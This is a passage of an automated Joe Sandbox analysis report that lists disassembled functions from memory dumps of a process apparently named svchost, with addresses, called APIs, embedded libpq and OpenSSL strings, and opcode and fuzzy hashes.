                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmalloc
                                                                                            • String ID: length must be given for binary parameter$out of memory
                                                                                            • API String ID: 1401199814-1562593421
                                                                                            • Opcode ID: be46cba841b5407c25af5a47a55b82b30aae5a6ca6dc10e47380a58bcf7efa13
                                                                                            • Instruction ID: b8c24433fb1e6c0860b0efbc28e6bfa7cad6a1cbb6822f5719dc3dcde599bc58
                                                                                            • Opcode Fuzzy Hash: be46cba841b5407c25af5a47a55b82b30aae5a6ca6dc10e47380a58bcf7efa13
                                                                                            • Instruction Fuzzy Hash: D2B18566B0BA4746F6106A12A5243BE5693AF497C4F5CB036DF0DAF387EE2FE0054358
                                                                                            Function 00007FFDA36E64F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 288COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getenv
                                                                                            • String ID: default$ion$options$user
                                                                                            • API String ID: 498649692-412184128
                                                                                            • Opcode ID: 3f8f7ff1b18ab859db54662fde6db203ed6893e6f2aefd7ceafdeedf9d7859f2
                                                                                            • Instruction ID: d8beadf4d8b1a823d0e8aef1308e20c633e0dc731df50839ee69ee08a16c6780
                                                                                            • Opcode Fuzzy Hash: 3f8f7ff1b18ab859db54662fde6db203ed6893e6f2aefd7ceafdeedf9d7859f2
                                                                                            • Instruction Fuzzy Hash: 2EC1B472B0A7C185FF918F1894943786B92EB05BA0F1CA331CE6D273D6DA2EE459C714
                                                                                            Function 00007FFDA36E68E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %s$insufficient data in "D" message$out of memory for query result$unexpected field count in "D" message
                                                                                            • API String ID: 0-3556674474
                                                                                            • Opcode ID: e8a662a0539064282ddcaa0ef1de2704ce51096314c0dcc4974e9e7ebdd857d8
                                                                                            • Instruction ID: bd0db220de45928f48542e8c670f3e4a08ca7d887441d68b8ec3583799537703
                                                                                            • Opcode Fuzzy Hash: e8a662a0539064282ddcaa0ef1de2704ce51096314c0dcc4974e9e7ebdd857d8
                                                                                            • Instruction Fuzzy Hash: 4B41C132B0B74282F7909B15E4602B96396EF44B84F1C6035DE4D6739BEE3DE545C344
                                                                                            Function 00007FFDA36E6D70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6DB2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6DD6
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6E36
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6EC4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdupmalloc
                                                                                            • String ID: show password_encryption
                                                                                            • API String ID: 111713529-3405507779
                                                                                            • Opcode ID: f44f98c0374278c73cb455ba2d4d850ae2f6bf9693e02ef51e0ee9e27ea8a49a
                                                                                            • Instruction ID: 0e6b3f43ffb4e229a4b55669fdc9b7ac998c7343fb807f60e912a7c807321db3
                                                                                            • Opcode Fuzzy Hash: f44f98c0374278c73cb455ba2d4d850ae2f6bf9693e02ef51e0ee9e27ea8a49a
                                                                                            • Instruction Fuzzy Hash: 9C419F7270AB8186EA548B15E4603B977A2FB49B90F6C5230DB6D573C6DF3DE0688704
                                                                                            Function 00007FFDA3630372 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_indentO_printf
                                                                                            • String ID: %s (%d)
                                                                                            • API String ID: 1860387303-2206749211
                                                                                            • Opcode ID: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                            • Instruction ID: b31bb7b72c2c7327ac70c38a7e871a2635de9c7a3e975e422dc8f3146d09179f
                                                                                            • Opcode Fuzzy Hash: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                            • Instruction Fuzzy Hash: 49310922F0E69286FA658B11D4641BD6B53BB45B90F0C7432CD4E27783DD7EE145C718
                                                                                            Function 00007FFDA36E1DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.VCRUNTIME140(?,?,show password_encryption,00007FFDA36E51AD,?,?,?,?,00007FFDA36DBA2F), ref: 00007FFDA36E1E32
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E51AD,?,?,?,?,00007FFDA36DBA2F), ref: 00007FFDA36E1E76
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E51AD,?,?,?,?,00007FFDA36DBA2F), ref: 00007FFDA36E1EC9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: realloc$memcpy
                                                                                            • String ID: cannot allocate memory for input buffer$show password_encryption
                                                                                            • API String ID: 1833655766-1268546043
                                                                                            • Opcode ID: 20c54c7f6b2cee35d43fafd5128733ff023de06a2b7e0576d69b630a30361051
                                                                                            • Instruction ID: ee8adb6152d85d978e552269bf2414ca1993e7368cecefd1c2209fbfa4e8c2cf
                                                                                            • Opcode Fuzzy Hash: 20c54c7f6b2cee35d43fafd5128733ff023de06a2b7e0576d69b630a30361051
                                                                                            • Instruction Fuzzy Hash: E631B162B0A78287F7688F34D5A02A9A3A6FB44B80F1C9035F72C53746EF39E5649304
                                                                                            Function 00007FFDA36E8C80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36E9D72), ref: 00007FFDA36E8C91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: SSL error code %lu$no SSL error reported$out of memory allocating error description
                                                                                            • API String ID: 2803490479-1444140898
                                                                                            • Opcode ID: 51f7fc59f20835072fbfc7eae73d3c927fcc3333a5e97449ff6f801172e6bebb
                                                                                            • Instruction ID: e9a2b3ff776b6f37a271a8eaeefeea027eb786de6ae6a62959fcccbd11e027f9
                                                                                            • Opcode Fuzzy Hash: 51f7fc59f20835072fbfc7eae73d3c927fcc3333a5e97449ff6f801172e6bebb
                                                                                            • Instruction Fuzzy Hash: EC11A211B1B20241FE859746F46167A0243AF89FC0E9C7034EE9D5B7C7DD2EE5954748
                                                                                            Function 00007FFDA36DA920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$isspacestrtol
                                                                                            • String ID: invalid integer value "%s" for connection option "%s"
                                                                                            • API String ID: 1719268402-1116420462
                                                                                            • Opcode ID: 8da0add9b8edb0698956a08a95f70b84b549ed375abf43c26cdfa670729aff50
                                                                                            • Instruction ID: f353a8f9ad926f438dd91f5c345f69f18dbac944ec54c97ef3c9de8ca14354b7
                                                                                            • Opcode Fuzzy Hash: 8da0add9b8edb0698956a08a95f70b84b549ed375abf43c26cdfa670729aff50
                                                                                            • Instruction Fuzzy Hash: 4321BE32B0EA5186FB114F12E46017977A2EB85BC0F1D6031EA8A57786CF7ED8448B54
                                                                                            Function 00007FFDA36EACB8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: %d$ NNNN$ParameterDescription$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3139820411
                                                                                            • Opcode ID: 25dadfa0205deaad2421ea02d93821641b1c4ac4cad77e70dfda24d0e451951c
                                                                                            • Instruction ID: fa511e1ae37e2edfadff1c19e8b36f9cfb17834e13ef9f124187287ce0c90fda
                                                                                            • Opcode Fuzzy Hash: 25dadfa0205deaad2421ea02d93821641b1c4ac4cad77e70dfda24d0e451951c
                                                                                            • Instruction Fuzzy Hash: BF219D62B1B65681FA50DB15E5606B82363AF807C8F587032DE0E27386DE7FE449C708
                                                                                            Function 00007FFDA36E8440 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53networkCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$R_clear_errorR_get_error
                                                                                            • String ID: unrecognized SSL error code: %d
                                                                                            • API String ID: 2453900891-952604332
                                                                                            • Opcode ID: 4007d4ba6e32ea23d925f505832090b004d32a86b82b32bd38b80115af959a6b
                                                                                            • Instruction ID: 054a5a6bf6292c1c97d2fb1e7de62402df8b28341ebad2efe66dd7ef71301601
                                                                                            • Opcode Fuzzy Hash: 4007d4ba6e32ea23d925f505832090b004d32a86b82b32bd38b80115af959a6b
                                                                                            • Instruction Fuzzy Hash: 4111C822B0AA4241FE61AF25E8253FA5353AF48BD4F5C5231DD1D5B3D7DE2DE5048348
                                                                                            Function 00007FFDA36EAA87 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: %d$ NNNN$BackendKeyData$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-637624318
                                                                                            • Opcode ID: dd555d9ec9d1b90d6c13fdf9287be0343ce7c5152412a7d6c55692e41b67fe8d
                                                                                            • Instruction ID: 27d4f070680631933f2629953db311b9f4a233536781d9cd6151a19312780808
                                                                                            • Opcode Fuzzy Hash: dd555d9ec9d1b90d6c13fdf9287be0343ce7c5152412a7d6c55692e41b67fe8d
                                                                                            • Instruction Fuzzy Hash: 4E118B61B1B64681FA10DB15E2616B92323AF407C8F487132DE0E2779BCEAFE459C708
                                                                                            Function 00007FFDA36EAC57 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: "%s"$ParameterStatus$Sync$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-854722980
                                                                                            • Opcode ID: 26a4c0d4b8ce23fdba49f9349e8e56aee1c591cd4a5fc701d122c9a091cea83e
                                                                                            • Instruction ID: c210036048778810e76bbde312770d469f70dbf69af994b0c5cd35ac4cafad33
                                                                                            • Opcode Fuzzy Hash: 26a4c0d4b8ce23fdba49f9349e8e56aee1c591cd4a5fc701d122c9a091cea83e
                                                                                            • Instruction Fuzzy Hash: EE118F61B1B68682FA10D755E4616F82363AB447D8F486132DE0E27397DE7EE14AC318
                                                                                            Function 00007FFDA36F5DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5DCC
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5DFC
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5E14
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$__acrt_iob_func
                                                                                            • String ID: unrecognized win32 error code: %lu
                                                                                            • API String ID: 2236517449-585351251
                                                                                            • Opcode ID: 428fbe94ade0e3b18c656962f5047164a2a92e0c565cf3502fdcf36ae76afd58
                                                                                            • Instruction ID: 1827e97b26472e6a1f9f795020c62ae1e32497ce816c20406cd256e6296867cf
                                                                                            • Opcode Fuzzy Hash: 428fbe94ade0e3b18c656962f5047164a2a92e0c565cf3502fdcf36ae76afd58
                                                                                            • Instruction Fuzzy Hash: 1A0136B2F07A0283FB194F55A8652783262AF48751F4D607DCA0E57352DE3D58D58738
                                                                                            Function 00007FFDA36DD020 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpystrncmpstrspn
                                                                                            • String ID: 0123456789$INSERT
                                                                                            • API String ID: 2919444188-1779590252
                                                                                            • Opcode ID: 076928b9be6be65e563f76d8eedd73c005b2c5abee4e6e329260d2cfde2ab327
                                                                                            • Instruction ID: 372d3094b3f572a2428607a39eb1b7ae9491b010a36b9f7315e265fb6c298b85
                                                                                            • Opcode Fuzzy Hash: 076928b9be6be65e563f76d8eedd73c005b2c5abee4e6e329260d2cfde2ab327
                                                                                            • Instruction Fuzzy Hash: BAF03162B0BA4582FB409F15E9603B52392AF58BC0F8C3031C90D57756FF6DD5A8C718
                                                                                            Function 00007FFDA364A3B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OPENSSL_LH_set_down_load.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3CF
                                                                                            • OPENSSL_LH_doall_arg.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3E2
                                                                                            • OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3EE
                                                                                            • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3F7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_deleteH_doall_argH_freeH_set_down_load
                                                                                            • String ID: ssl\quic\quic_lcidm.c
                                                                                            • API String ID: 473658108-3923830422
                                                                                            • Opcode ID: 550a5efd96314d58762f6876004fea294068b4d5f562269aa692825f48097bde
                                                                                            • Instruction ID: 4941ba298c9ad1f2fcdf27e53bc078e93c85dbe845025f30a9ba84b54f7b220d
                                                                                            • Opcode Fuzzy Hash: 550a5efd96314d58762f6876004fea294068b4d5f562269aa692825f48097bde
                                                                                            • Instruction Fuzzy Hash: 57F05451F0998293FA04DB17DAA517CA323EF88BC4F08A431DE0D577A7DE2DD4614308
                                                                                            Function 00007FFDA36DC560 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 218COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$libintl_dgettext
                                                                                            • String ID: lost synchronization with server: got message type "%c", length %d$no COPY in progress$out of memory
                                                                                            • API String ID: 2163055111-1965408795
                                                                                            • Opcode ID: 5576f990c1db1dc8e20ea08c1831423e82589330521fd98d53272a0eebba8964
                                                                                            • Instruction ID: fe99434af8ba785786fe7d93dbc6d04d6ed17085ff127310475665d48667f68a
                                                                                            • Opcode Fuzzy Hash: 5576f990c1db1dc8e20ea08c1831423e82589330521fd98d53272a0eebba8964
                                                                                            • Instruction Fuzzy Hash: 4C812572B0A64242FB119F69A5603BD63A3AF84BA4F1C6031DF0D563D6EE3DD4898704
                                                                                            Function 00007FFDA36DDFC0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 181COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: '$incomplete multibyte character$out of memory
                                                                                            • API String ID: 2803490479-3165003887
